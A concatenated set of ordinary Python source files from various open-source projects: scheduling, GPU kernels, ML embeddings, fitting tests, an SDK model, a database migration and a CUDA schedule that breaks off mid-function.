examples/schedule/schedule_scripts.py | timgates42/plan | 553 | 12688502 | # -*- coding: utf-8 -*-
# Use this file to easily define all of your cron jobs.
#
# It's helpful to understand cron before proceeding.
# http://en.wikipedia.org/wiki/Cron
#
# Learn more: http://github.com/fengsp/plan
from plan import Plan
cron = Plan("scripts", path='/web/yourproject/scripts',
environment={'YOURAPP_ENV': 'production'})
cron.script('script.py', every='1.day')
cron.script('script_2.py', every='1.month', at='hour.12 minute.0')
# more scripts here
if __name__ == "__main__":
cron.run('update')
|
examples/jit/reduction_simple.py | prkhrsrvstv1/cupy | 6,180 | 12688507 | import cupy
from cupyx import jit
@jit.rawkernel()
def reduction(x, y, size):
tid = jit.threadIdx.x
ntid = jit.blockDim.x
value = cupy.float32(0)
for i in range(tid, size, ntid):
value += x[i]
smem = jit.shared_memory(cupy.float32, 1024)
smem[tid] = value
jit.syncthreads()
if tid == cupy.uint32(0):
value = cupy.float32(0)
for i in range(ntid):
value += smem[i]
y[0] = value
size = cupy.uint32(2 ** 22)
x = cupy.random.normal(size=(size,), dtype=cupy.float32)
y = cupy.empty((1,), dtype=cupy.float32)
reduction[1, 1024](x, y, size)
print(y[0])
print(x.sum())
|
dash-static-image-serve.py | oriolmirosa/dash-recipes | 932 | 12688509 | import dash
import dash_html_components as html
import flask  # needed for flask.send_from_directory in the static route below
import os
import config
STATIC_PREFIX = '/{}/static/'.format(config.DASH_APP_NAME)
app = dash.Dash()
server = app.server  # underlying Flask app, used by the @server.route below
app.layout = html.Div([
html.Img(src='{}my-image.png'.format(STATIC_PREFIX))
])
# Static routes for on-premise are a little bit different than local
# because the Plotly On-Premise proxy server strips away the app name
# before forwarding the request to Dash
if 'DYNO' in os.environ:
static_route = '/static/<path:path>'
else:
static_route = '/{}/static/<path:path>'.format(config.DASH_APP_NAME)
@server.route(static_route)
def serve_static(path):
root_dir = os.getcwd()
return flask.send_from_directory(
os.path.join(root_dir, 'static'), path
)
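# Standard Dash dev-server entry point (a sketch; the debug flag is an assumption):
if __name__ == '__main__':
    app.run_server(debug=True)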
|
kashgari/embeddings/abc_embedding.py | SharpKoi/Kashgari | 2,422 | 12688537 | # encoding: utf-8
# author: BrikerMan
# contact: <EMAIL>
# blog: https://eliyar.biz
# file: abc_embedding.py
# time: 2:43 PM
import json
from typing import Dict, List, Any, Optional, Union
import numpy as np
import tensorflow as tf
import tqdm
import kashgari
from kashgari.generators import CorpusGenerator
from kashgari.logger import logger
from kashgari.processors import ABCProcessor
L = tf.keras.layers
class ABCEmbedding:
def to_dict(self) -> Dict[str, Any]:
config: Dict[str, Any] = {
'segment': self.segment,
'embedding_size': self.embedding_size,
'max_position': self.max_position,
**self.kwargs
}
return {
'__class_name__': self.__class__.__name__,
'__module__': self.__class__.__module__,
'config': config,
'embed_model': json.loads(self.embed_model.to_json())
}
def __init__(self,
segment: bool = False,
embedding_size: int = 100,
max_position: int = None,
**kwargs: Any):
self.embed_model: tf.keras.Model = None
self.segment: bool = segment # type: ignore
self.kwargs = kwargs
self.embedding_size: int = embedding_size # type: ignore
self.max_position: int = max_position # type: ignore
self.vocab2idx = self.load_embed_vocab()
self._text_processor: Optional[ABCProcessor] = None
def _override_load_model(self, config: Dict) -> None:
embed_model_json_str = json.dumps(config['embed_model'])
self.embed_model = tf.keras.models.model_from_json(embed_model_json_str,
custom_objects=kashgari.custom_objects)
def setup_text_processor(self, processor: ABCProcessor) -> None:
self._text_processor = processor
self.build_embedding_model(vocab_size=processor.vocab_size)
self._text_processor.segment = self.segment
if self.vocab2idx:
self._text_processor.vocab2idx = self.vocab2idx
self._text_processor.idx2vocab = dict([(v, k) for k, v in self.vocab2idx.items()])
def get_seq_length_from_corpus(self,
generators: List[CorpusGenerator],
*,
use_label: bool = False,
cover_rate: float = 0.95) -> int:
"""
        Calculate a proper sequence length according to the corpus
        Args:
            generators: corpus generators to scan for sample lengths
            use_label: if True, measure label lengths instead of sentence lengths
            cover_rate: fraction of samples whose length should be covered
        Returns:
            the sequence length that covers ``cover_rate`` of the samples
"""
seq_lens = []
for gen in generators:
for sentence, label in tqdm.tqdm(gen, desc="Calculating sequence length"):
if use_label:
seq_lens.append(len(label))
else:
seq_lens.append(len(sentence))
if cover_rate == 1.0:
target_index = -1
else:
target_index = int(cover_rate * len(seq_lens))
sequence_length = sorted(seq_lens)[target_index]
logger.debug(f'Calculated sequence length = {sequence_length}')
return sequence_length
def load_embed_vocab(self) -> Optional[Dict[str, int]]:
"""
Load vocab dict from embedding layer
Returns:
vocab dict or None
"""
raise NotImplementedError
def build_embedding_model(self,
*,
vocab_size: int = None,
force: bool = False,
**kwargs: Dict) -> None:
raise NotImplementedError
def embed(self,
sentences: List[List[str]],
*,
debug: bool = False) -> np.ndarray:
"""
batch embed sentences
Args:
sentences: Sentence list to embed
debug: show debug info
Returns:
vectorized sentence list
"""
if self._text_processor is None:
raise ValueError('Need to setup the `embedding.setup_text_processor` before calling the embed function.')
tensor_x = self._text_processor.transform(sentences,
segment=self.segment,
seq_length=self.max_position)
if debug:
logger.debug(f'sentence tensor: {tensor_x}')
embed_results = self.embed_model.predict(tensor_x)
return embed_results
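# A minimal concrete subclass sketch (not part of the original file), showing one
# way the two abstract hooks could be filled in. The layer names and the use of
# the Keras functional API here are illustrative assumptions, not Kashgari code.
class MinimalEmbeddingSketch(ABCEmbedding):
    def load_embed_vocab(self) -> Optional[Dict[str, int]]:
        # No pre-built vocabulary: rely on the text processor attached later.
        return None
    def build_embedding_model(self,
                              *,
                              vocab_size: int = None,
                              force: bool = False,
                              **kwargs: Dict) -> None:
        if (self.embed_model is None or force) and vocab_size is not None:
            token_input = L.Input(shape=(None,), name='token_input')
            embedded = L.Embedding(vocab_size,
                                   self.embedding_size,
                                   name='token_embedding')(token_input)
            self.embed_model = tf.keras.Model(token_input, embedded)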
if __name__ == "__main__":
pass
|
tensorflow/python/framework/kernels.py | abhaikollara/tensorflow | 848 | 12688545 |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for querying registered kernels."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.core.framework import kernel_def_pb2
from tensorflow.python import pywrap_tensorflow as c_api
from tensorflow.python.util import compat
def get_all_registered_kernels():
"""Returns a KernelList proto of all registered kernels.
"""
buf = c_api.TF_GetAllRegisteredKernels()
data = c_api.TF_GetBuffer(buf)
kernel_list = kernel_def_pb2.KernelList()
kernel_list.ParseFromString(compat.as_bytes(data))
return kernel_list
def get_registered_kernels_for_op(name):
"""Returns a KernelList proto of registered kernels for a given op.
Args:
name: A string representing the name of the op whose kernels to retrieve.
"""
buf = c_api.TF_GetRegisteredKernelsForOp(name)
data = c_api.TF_GetBuffer(buf)
kernel_list = kernel_def_pb2.KernelList()
kernel_list.ParseFromString(compat.as_bytes(data))
return kernel_list
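# Hedged usage sketch (not part of the original module): KernelList is a proto
# with a repeated `kernel` field of KernelDef messages, so registrations can be
# listed as below; the "AddN" op name is only an illustrative assumption.
if __name__ == "__main__":
    for kernel in get_registered_kernels_for_op("AddN").kernel:
        print(kernel.op, kernel.device_type)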
|
gammapy/modeling/tests/test_fit.py | ischigal/gammapy | 155 | 12688567 |
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""Unit tests for the Fit class"""
import pytest
from numpy.testing import assert_allclose
from astropy.table import Table
from gammapy.datasets import Dataset
from gammapy.modeling import Fit, Parameter
from gammapy.modeling.models import Model, Models
from gammapy.utils.testing import requires_dependency
pytest.importorskip("iminuit")
class MyModel(Model):
x = Parameter("x", 2)
y = Parameter("y", 3e2)
z = Parameter("z", 4e-2)
name = "test"
datasets_names = ["test"]
type = "model"
class MyDataset(Dataset):
tag = "MyDataset"
def __init__(self, name="test"):
self._name = name
self._models = Models([MyModel(x=1.99, y=2.99e3, z=3.99e-2)])
self.data_shape = (1,)
self.meta_table = Table()
@property
def models(self):
return self._models
def stat_sum(self):
# self._model.parameters = parameters
x, y, z = [p.value for p in self.models.parameters]
x_opt, y_opt, z_opt = 2, 3e2, 4e-2
return (x - x_opt) ** 2 + (y - y_opt) ** 2 + (z - z_opt) ** 2
def fcn(self):
x, y, z = [p.value for p in self.models.parameters]
x_opt, y_opt, z_opt = 2, 3e5, 4e-5
x_err, y_err, z_err = 0.2, 3e4, 4e-6
return (
((x - x_opt) / x_err) ** 2
+ ((y - y_opt) / y_err) ** 2
+ ((z - z_opt) / z_err) ** 2
)
def stat_array(self):
"""Statistic array, one value per data point."""
@requires_dependency("iminuit")
@requires_dependency("sherpa")
@pytest.mark.parametrize("backend", ["sherpa", "scipy"])
def test_optimize_backend_and_covariance(backend):
dataset = MyDataset()
if backend == "scipy":
kwargs = {"method": "L-BFGS-B"}
else:
kwargs = {}
kwargs["backend"] = backend
fit = Fit(optimize_opts=kwargs)
result = fit.run([dataset])
result = result["optimize_result"]
pars = result.parameters
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-2)
assert_allclose(pars["x"].error, 1, rtol=1e-7)
assert_allclose(pars["y"].error, 1, rtol=1e-7)
assert_allclose(pars["z"].error, 1, rtol=1e-7)
correlation = dataset.models.covariance.correlation
assert_allclose(correlation[0, 1], 0, atol=1e-7)
assert_allclose(correlation[0, 2], 0, atol=1e-7)
assert_allclose(correlation[1, 2], 0, atol=1e-7)
@pytest.mark.parametrize("backend", ["minuit"])
def test_run(backend):
dataset = MyDataset()
fit = Fit(backend=backend)
result = fit.run([dataset])
result = result["optimize_result"]
pars = result.parameters
assert result.success is True
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-3)
assert_allclose(pars["x"].error, 1, rtol=1e-7)
assert_allclose(pars["y"].error, 1, rtol=1e-7)
assert_allclose(pars["z"].error, 1, rtol=1e-7)
correlation = dataset.models.covariance.correlation
assert_allclose(correlation[0, 1], 0, atol=1e-7)
assert_allclose(correlation[0, 2], 0, atol=1e-7)
assert_allclose(correlation[1, 2], 0, atol=1e-7)
@requires_dependency("sherpa")
@pytest.mark.parametrize("backend", ["minuit", "sherpa", "scipy"])
def test_optimize(backend):
dataset = MyDataset()
if backend == "scipy":
kwargs = {"method": "L-BFGS-B"}
else:
kwargs = {}
fit = Fit(store_trace=True, backend=backend, optimize_opts=kwargs)
result = fit.optimize([dataset])
pars = dataset.models.parameters
assert result.success is True
assert_allclose(result.total_stat, 0, atol=1)
assert_allclose(pars["x"].value, 2, rtol=1e-3)
assert_allclose(pars["y"].value, 3e2, rtol=1e-3)
assert_allclose(pars["z"].value, 4e-2, rtol=1e-2)
assert len(result.trace) == result.nfev
# TODO: add some extra covariance tests, in addition to run
# Probably mainly if error message is OK if optimize didn't run first.
# def test_covariance():
@pytest.mark.parametrize("backend", ["minuit"])
def test_confidence(backend):
dataset = MyDataset()
fit = Fit(backend=backend)
fit.optimize([dataset])
result = fit.confidence(datasets=[dataset], parameter="x")
assert result["success"] is True
assert_allclose(result["errp"], 1)
assert_allclose(result["errn"], 1)
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
@pytest.mark.parametrize("backend", ["minuit"])
def test_confidence_frozen(backend):
dataset = MyDataset()
dataset.models.parameters["x"].frozen = True
fit = Fit(backend=backend)
fit.optimize([dataset])
result = fit.confidence(datasets=[dataset], parameter="y")
assert result["success"] is True
assert_allclose(result["errp"], 1)
assert_allclose(result["errn"], 1)
def test_stat_profile():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
dataset.models.parameters["x"].scan_n_values = 3
result = fit.stat_profile(datasets=[dataset], parameter="x")
assert_allclose(result["x_scan"], [0, 2, 4], atol=1e-7)
assert_allclose(result["stat_scan"], [4, 0, 4], atol=1e-7)
assert len(result["fit_results"]) == 0
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
def test_stat_profile_reoptimize():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
dataset.models.parameters["y"].value = 0
dataset.models.parameters["x"].scan_n_values = 3
result = fit.stat_profile(datasets=[dataset], parameter="x", reoptimize=True)
assert_allclose(result["x_scan"], [0, 2, 4], atol=1e-7)
assert_allclose(result["stat_scan"], [4, 0, 4], atol=1e-7)
assert_allclose(
result["fit_results"][0].total_stat, result["stat_scan"][0], atol=1e-7
)
def test_stat_surface():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
x_values = [1, 2, 3]
y_values = [2e2, 3e2, 4e2]
dataset.models.parameters["x"].scan_values = x_values
dataset.models.parameters["y"].scan_values = y_values
result = fit.stat_surface(datasets=[dataset], x="x", y="y")
assert_allclose(result["x_scan"], x_values, atol=1e-7)
assert_allclose(result["y_scan"], y_values, atol=1e-7)
expected_stat = [
[1.0001e04, 1.0000e00, 1.0001e04],
[1.0000e04, 0.0000e00, 1.0000e04],
[1.0001e04, 1.0000e00, 1.0001e04],
]
assert_allclose(list(result["stat_scan"]), expected_stat, atol=1e-7)
assert len(result["fit_results"]) == 0
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["x"].value, 2)
assert_allclose(dataset.models.parameters["y"].value, 3e2)
def test_stat_surface_reoptimize():
dataset = MyDataset()
fit = Fit()
fit.run([dataset])
x_values = [1, 2, 3]
y_values = [2e2, 3e2, 4e2]
dataset.models.parameters["z"].value = 0
dataset.models.parameters["x"].scan_values = x_values
dataset.models.parameters["y"].scan_values = y_values
result = fit.stat_surface(
datasets=[dataset], x="x", y="y", reoptimize=True
)
assert_allclose(result["x_scan"], x_values, atol=1e-7)
assert_allclose(result["y_scan"], y_values, atol=1e-7)
expected_stat = [
[1.0001e04, 1.0000e00, 1.0001e04],
[1.0000e04, 0.0000e00, 1.0000e04],
[1.0001e04, 1.0000e00, 1.0001e04],
]
assert_allclose(list(result["stat_scan"]), expected_stat, atol=1e-7)
assert_allclose(
result["fit_results"][0][0].total_stat, result["stat_scan"][0][0], atol=1e-7
)
def test_stat_contour():
dataset = MyDataset()
dataset.models.parameters["x"].frozen = True
fit = Fit(backend="minuit")
fit.optimize([dataset])
result = fit.stat_contour(datasets=[dataset], x="y", y="z")
assert result["success"] is True
x = result["y"]
assert_allclose(len(x), 10)
assert_allclose(x[0], 299, rtol=1e-5)
assert_allclose(x[-1], 299.292893, rtol=1e-5)
y = result["z"]
assert_allclose(len(y), 10)
assert_allclose(y[0], 0.04, rtol=1e-5)
assert_allclose(y[-1], 0.747107, rtol=1e-5)
# Check that original value state wasn't changed
assert_allclose(dataset.models.parameters["y"].value, 300)
|
alipay/aop/api/domain/AlipayMarketingCrowdDataSyncModel.py | snowxmas/alipay-sdk-python-all | 213 | 12688576 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayMarketingCrowdDataSyncModel(object):
def __init__(self):
self._biz_from = None
self._create_id = None
self._crowd_id = None
self._crowd_name = None
self._crowd_size = None
self._crowd_status = None
self._end_time = None
self._owner_id = None
self._start_time = None
self._update_circle_type = None
@property
def biz_from(self):
return self._biz_from
@biz_from.setter
def biz_from(self, value):
self._biz_from = value
@property
def create_id(self):
return self._create_id
@create_id.setter
def create_id(self, value):
self._create_id = value
@property
def crowd_id(self):
return self._crowd_id
@crowd_id.setter
def crowd_id(self, value):
self._crowd_id = value
@property
def crowd_name(self):
return self._crowd_name
@crowd_name.setter
def crowd_name(self, value):
self._crowd_name = value
@property
def crowd_size(self):
return self._crowd_size
@crowd_size.setter
def crowd_size(self, value):
self._crowd_size = value
@property
def crowd_status(self):
return self._crowd_status
@crowd_status.setter
def crowd_status(self, value):
self._crowd_status = value
@property
def end_time(self):
return self._end_time
@end_time.setter
def end_time(self, value):
self._end_time = value
@property
def owner_id(self):
return self._owner_id
@owner_id.setter
def owner_id(self, value):
self._owner_id = value
@property
def start_time(self):
return self._start_time
@start_time.setter
def start_time(self, value):
self._start_time = value
@property
def update_circle_type(self):
return self._update_circle_type
@update_circle_type.setter
def update_circle_type(self, value):
self._update_circle_type = value
def to_alipay_dict(self):
params = dict()
if self.biz_from:
if hasattr(self.biz_from, 'to_alipay_dict'):
params['biz_from'] = self.biz_from.to_alipay_dict()
else:
params['biz_from'] = self.biz_from
if self.create_id:
if hasattr(self.create_id, 'to_alipay_dict'):
params['create_id'] = self.create_id.to_alipay_dict()
else:
params['create_id'] = self.create_id
if self.crowd_id:
if hasattr(self.crowd_id, 'to_alipay_dict'):
params['crowd_id'] = self.crowd_id.to_alipay_dict()
else:
params['crowd_id'] = self.crowd_id
if self.crowd_name:
if hasattr(self.crowd_name, 'to_alipay_dict'):
params['crowd_name'] = self.crowd_name.to_alipay_dict()
else:
params['crowd_name'] = self.crowd_name
if self.crowd_size:
if hasattr(self.crowd_size, 'to_alipay_dict'):
params['crowd_size'] = self.crowd_size.to_alipay_dict()
else:
params['crowd_size'] = self.crowd_size
if self.crowd_status:
if hasattr(self.crowd_status, 'to_alipay_dict'):
params['crowd_status'] = self.crowd_status.to_alipay_dict()
else:
params['crowd_status'] = self.crowd_status
if self.end_time:
if hasattr(self.end_time, 'to_alipay_dict'):
params['end_time'] = self.end_time.to_alipay_dict()
else:
params['end_time'] = self.end_time
if self.owner_id:
if hasattr(self.owner_id, 'to_alipay_dict'):
params['owner_id'] = self.owner_id.to_alipay_dict()
else:
params['owner_id'] = self.owner_id
if self.start_time:
if hasattr(self.start_time, 'to_alipay_dict'):
params['start_time'] = self.start_time.to_alipay_dict()
else:
params['start_time'] = self.start_time
if self.update_circle_type:
if hasattr(self.update_circle_type, 'to_alipay_dict'):
params['update_circle_type'] = self.update_circle_type.to_alipay_dict()
else:
params['update_circle_type'] = self.update_circle_type
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayMarketingCrowdDataSyncModel()
if 'biz_from' in d:
o.biz_from = d['biz_from']
if 'create_id' in d:
o.create_id = d['create_id']
if 'crowd_id' in d:
o.crowd_id = d['crowd_id']
if 'crowd_name' in d:
o.crowd_name = d['crowd_name']
if 'crowd_size' in d:
o.crowd_size = d['crowd_size']
if 'crowd_status' in d:
o.crowd_status = d['crowd_status']
if 'end_time' in d:
o.end_time = d['end_time']
if 'owner_id' in d:
o.owner_id = d['owner_id']
if 'start_time' in d:
o.start_time = d['start_time']
if 'update_circle_type' in d:
o.update_circle_type = d['update_circle_type']
return o
|
Lib/test/test_strptime_jy.py | jeff5/jython-whinchat | 577 | 12688580 | # Java locale differences from JDK 9 onwards, and locale variation on
# developer machines, break test_strptime tests. This manifests more on Windows.
# Rather than diverge from the Python source, this overrides with extra locale
# setup.
# Merging back into CPython is desirable, but is a bigger discussion around
# library merging generally.
import unittest
from datetime import datetime
from time import strptime
from test.test_strptime import *
from test import test_support
class ParsingTests(unittest.TestCase):
def test_iso8601(self):
now = datetime.utcnow().replace(microsecond=0)
self.assertEqual(now, datetime.strptime(now.isoformat('T'), "%Y-%m-%dT%H:%M:%S"))
# tests bug 1662
self.assertEqual(now, datetime.strptime(now.isoformat('T') + 'Z', "%Y-%m-%dT%H:%M:%SZ"))
def test_IllegalArgument_to_ValueError(self):
with self.assertRaises(ValueError):
d = strptime('', '%e')
def test_issue1964(self):
d = strptime('0', '%f')
self.assertEqual(1900, d.tm_year)
def test_issue2112(self):
d = strptime('1', '%d')
self.assertEqual(1900, d.tm_year)
def test_main(initialize=True):
test_support.force_reset_locale(initialize)
test_support.run_unittest(
getlang_Tests,
LocaleTime_Tests,
TimeRETests,
StrptimeTests,
Strptime12AMPMTests,
JulianTests,
CalculationTests,
CacheTests,
ParsingTests
)
if __name__ == '__main__':
test_main(initialize=False)
|
Dynamic Programming/Create Maximum Cost List/solution.py | iabhimanyu/Algorithms | 715 | 12688590 | '''
@author: <NAME>
Filling one cell: O(1)
Filling all cells: O(2xn) = O(n)
'''
def find_maximum_cost(Y):
values = [[0 for _ in range(2)] for _ in range(len(Y))]
    # values[i][0]: best total cost so far when element i is lowered to 1
    # values[i][1]: best total cost so far when element i keeps its value Y[i]
i = 1
while i < len(Y):
        # Transition from the previous element being either lowered to 1 or kept at Y[i - 1]
values[i][0] = max(values[i - 1][0], values[i - 1][1] + Y[i - 1] - 1)
values[i][1] = max(values[i - 1][1] + abs(Y[i] - Y[i - 1]), values[i - 1][0] + Y[i] - 1)
i += 1
#print(values)
return max(values[len(Y) - 1][0], values[len(Y) - 1][1])
def main():
Y = [5, 6, 8, 13, 9]
cost = find_maximum_cost(Y)
print(cost)
# Output: 34
main()
|
migration/migrator/migrations/course/20200402034200_overall_comments.py | zeez2030/Submitty | 411 | 12688624 |
"""Migration for a given Submitty course database."""
def up(config, database, semester, course):
"""
Run up migration.
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
# Create overall comment table
database.execute(
"""
CREATE TABLE IF NOT EXISTS gradeable_data_overall_comment (
goc_id integer NOT NULL,
g_id character varying(255) NOT NULL,
goc_user_id character varying(255),
goc_team_id character varying(255),
goc_grader_id character varying(255) NOT NULL,
goc_overall_comment character varying NOT NULL,
CONSTRAINT goc_user_team_id_check CHECK (goc_user_id IS NOT NULL OR goc_team_id IS NOT NULL)
);
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_pkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_pkey PRIMARY KEY (goc_id);
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_g_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_g_id_fkey FOREIGN KEY (g_id) REFERENCES gradeable(g_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_user_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_user_id_fkey FOREIGN KEY (goc_user_id) REFERENCES users(user_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_team_id_fkey")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_team_id_fkey FOREIGN KEY (goc_team_id) REFERENCES gradeable_teams(team_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_goc_grader_id")
database.execute(
"""
ALTER TABLE ONLY gradeable_data_overall_comment
ADD CONSTRAINT gradeable_data_overall_comment_goc_grader_id FOREIGN KEY (goc_grader_id) REFERENCES users(user_id) ON DELETE CASCADE;
"""
)
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_user_unique")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_user_unique UNIQUE (g_id, goc_user_id, goc_grader_id);")
database.execute("ALTER TABLE gradeable_data_overall_comment DROP CONSTRAINT IF EXISTS gradeable_data_overall_comment_team_unique")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ADD CONSTRAINT gradeable_data_overall_comment_team_unique UNIQUE (g_id, goc_team_id, goc_grader_id);")
database.execute(
"""
CREATE SEQUENCE IF NOT EXISTS gradeable_data_overall_comment_goc_id_seq
START WITH 1
INCREMENT BY 1
NO MINVALUE
NO MAXVALUE
CACHE 1;
""")
database.execute("ALTER SEQUENCE gradeable_data_overall_comment_goc_id_seq OWNED BY gradeable_data_overall_comment.goc_id;")
database.execute("ALTER TABLE ONLY gradeable_data_overall_comment ALTER COLUMN goc_id SET DEFAULT nextval('gradeable_data_overall_comment_goc_id_seq'::regclass);")
# All old overall comments belong to the instructor
instructor_id = database.execute("SELECT user_id FROM users WHERE user_group = 1;").first()[0]
rows = database.execute("""
SELECT
g_id,
gd_user_id,
gd_team_id,
gd_overall_comment
FROM
gradeable_data;
"""
)
for g_id, user_id, team_id, comment in rows:
query = '''
INSERT INTO gradeable_data_overall_comment
(
g_id,
goc_user_id,
goc_team_id,
goc_grader_id,
goc_overall_comment
) VALUES (
:g_id, :user_id, :team_id, :grader_id, :comment
)
ON CONFLICT
DO NOTHING;
'''
params = {
'g_id':g_id,
'user_id':user_id,
'team_id':team_id,
'grader_id':instructor_id,
'comment':comment
}
database.session.execute(query, params)
def down(config, database, semester, course):
"""
Run down migration (rollback).
:param config: Object holding configuration details about Submitty
:type config: migrator.config.Config
:param database: Object for interacting with given database for environment
:type database: migrator.db.Database
:param semester: Semester of the course being migrated
:type semester: str
:param course: Code of course being migrated
:type course: str
"""
pass
|
flextensor/testing/others/test_conv2d_cuda_different_schedule.py | imxian/FlexTensor | 135 | 12688632 |
"""
Test different schedules on conv2d_nchw
Target NVIDIA GPU
====================================
**Author**: `<NAME>`
"""
import tvm
import json
from flextensor.measure import _evaluate
from flextensor.nn import conv2d_nchw
from flextensor.configs.conv2d_config import yolo_shapes_b8
from flextensor.utils import any_factor_split
class Parameter(object):
def __init__(self):
self.b_factors = [2, 4, 1, 1]
self.k_factors = [8, 4, 8, 2]
self.p_factors = [7, 1, 2, 1]
self.q_factors = [1, 1, 14, 1]
self.rc_factors = [1, 32, 32]
self.ry_factors = [1, 1, 1]
self.rx_factors = [1, 1, 1]
def __str__(self):
ret = ""
ret += str(self.b_factors) + "\n"
ret += str(self.k_factors) + "\n"
ret += str(self.p_factors) + "\n"
ret += str(self.q_factors) + "\n"
ret += str(self.rc_factors) + "\n"
ret += str(self.ry_factors) + "\n"
ret += str(self.rx_factors) + "\n"
return ret
def schedule_yolo_conv_cuda_1(s, outputs, inputs, weight, parameter):
# inline the padding operation
padded = outputs.op.input_tensors[0]
# create cache
write_cache = s.cache_write(outputs, "local")
read_share_weight = s.cache_read(weight, "shared", [write_cache])
# read_local_weight = s.cache_read(read_share_weight, "local", [write_cache])
read_share_inputs = s.cache_read(padded, "shared", [write_cache])
# read_local_inputs = s.cache_read(read_share_inputs, "local", [write_cache])
b_factors = parameter.b_factors
k_factors = parameter.k_factors
p_factors = parameter.p_factors
q_factors = parameter.q_factors
rc_factors = parameter.rc_factors
ry_factors = parameter.ry_factors
rx_factors = parameter.rx_factors
# prepare thread_axis
bx = tvm.te.thread_axis("blockIdx.x")
by = tvm.te.thread_axis("blockIdx.y")
bz = tvm.te.thread_axis("blockIdx.z")
vx = tvm.te.thread_axis("vthread")
vy = tvm.te.thread_axis("vthread")
vz = tvm.te.thread_axis("vthread")
tx = tvm.te.thread_axis("threadIdx.x")
ty = tvm.te.thread_axis("threadIdx.y")
tz = tvm.te.thread_axis("threadIdx.z")
# split the spatial axes
b, k, p, q = s[outputs].op.axis
kernel_scope, b = s[outputs].split(b, nparts=1)
bo, bi = s[outputs].split(b, nparts=b_factors[0])
ko, ki = s[outputs].split(k, nparts=k_factors[0])
po, pi = s[outputs].split(p, nparts=p_factors[0])
qo, qi = s[outputs].split(q, nparts=q_factors[0])
vbo, bi = s[outputs].split(bi, nparts=b_factors[1])
vko, ki = s[outputs].split(ki, nparts=k_factors[1])
vpo, pi = s[outputs].split(pi, nparts=p_factors[1])
vqo, qi = s[outputs].split(qi, nparts=q_factors[1])
tbo, bi = s[outputs].split(bi, nparts=b_factors[2])
tko, ki = s[outputs].split(ki, nparts=k_factors[2])
tpo, pi = s[outputs].split(pi, nparts=p_factors[2])
tqo, qi = s[outputs].split(qi, nparts=q_factors[2])
# reorder
s[outputs].reorder(bo, ko, po, qo, vbo, vko, vpo, vqo, tbo, tko, tpo, tqo, bi, ki, pi, qi)
# fuse
bko = s[outputs].fuse(bo, ko)
vbko = s[outputs].fuse(vbo, vko)
tbko = s[outputs].fuse(tbo, tko)
bki = s[outputs].fuse(bi, ki)
# bind
s[outputs].bind(bko, bz)
s[outputs].bind(po, by)
s[outputs].bind(qo, bx)
s[outputs].bind(vbko, vz)
s[outputs].bind(vpo, vy)
s[outputs].bind(vqo, vx)
s[outputs].bind(tbko, tz)
s[outputs].bind(tpo, ty)
s[outputs].bind(tqo, tx)
# compute at write cache
s[write_cache].compute_at(s[outputs], tqo)
rc, ry, rx = s[write_cache].op.reduce_axis
rco, rci = s[write_cache].split(rc, nparts=rc_factors[0])
rcm, rci = s[write_cache].split(rci, nparts=rc_factors[1])
ryo, ryi = s[write_cache].split(ry, nparts=ry_factors[0])
rym, ryi = s[write_cache].split(ryi, nparts=ry_factors[1])
rxo, rxi = s[write_cache].split(rx, nparts=rx_factors[0])
rxm, rxi = s[write_cache].split(rxi, nparts=rx_factors[1])
a, b, c, d = s[write_cache].op.axis
s[write_cache].reorder(rco, ryo, rxo, rcm, rym, rxm, rci, ryi, rxi, a, b, c, d)
# compute at read cache
s[read_share_weight].compute_at(s[write_cache], rxm)
# s[read_local_weight].compute_at(s[write_cache], rxi)
s[read_share_inputs].compute_at(s[write_cache], rxm)
